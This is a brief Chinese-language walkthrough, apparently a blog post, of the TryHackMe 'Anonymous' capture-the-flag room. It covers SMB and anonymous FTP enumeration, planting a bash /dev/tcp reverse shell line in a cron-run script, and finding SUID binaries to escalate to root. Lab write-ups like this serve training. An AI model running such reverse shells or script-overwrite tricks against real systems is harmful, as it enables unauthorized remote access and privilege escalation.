简介:
尝试获得这两个标志!扎根机器并证明您对基本原理的理解!这是一个适合初学者的虚拟机。获取这两个标志需要一些 Linux 和特权升级方法的基本知识。
房间链接:
https://tryhackme.com/room/anonymous
问题:
挑战开始:
首先扫描端口
发现开启了4个端口
首先看下smb
smbclient -L 10.10.243.225
发现有一个共享文件夹,链接下载本地,发现只是普通的图片,并没有什么信息
接着查看21端口的ftp,第一次连接随便输入了个用户名,提示只能匿名登陆,于是第二次连接成功链接,发现有一个文件夹
进入文件夹把文件夹里面的文件下载下来,发现是一个脚本和一个日志文件还有一个txt
并且在不停的定时执行
这里我们在脚本里面加入反弹shell的命令
/bin/bash -i > /dev/tcp/10.10.170.192/8888 0<&1 2>&1
再将本地的脚本上传覆盖上去
本地打开监听,过了一会成功收到shell,找到flag
接着尝试suid提权
发现一个有趣的程序存在suid
find / -user root -perm -4000 -exec ls -ldb {} \;
直接根据方法利用
成功提权,获取root flag
答案
Comments NOTHING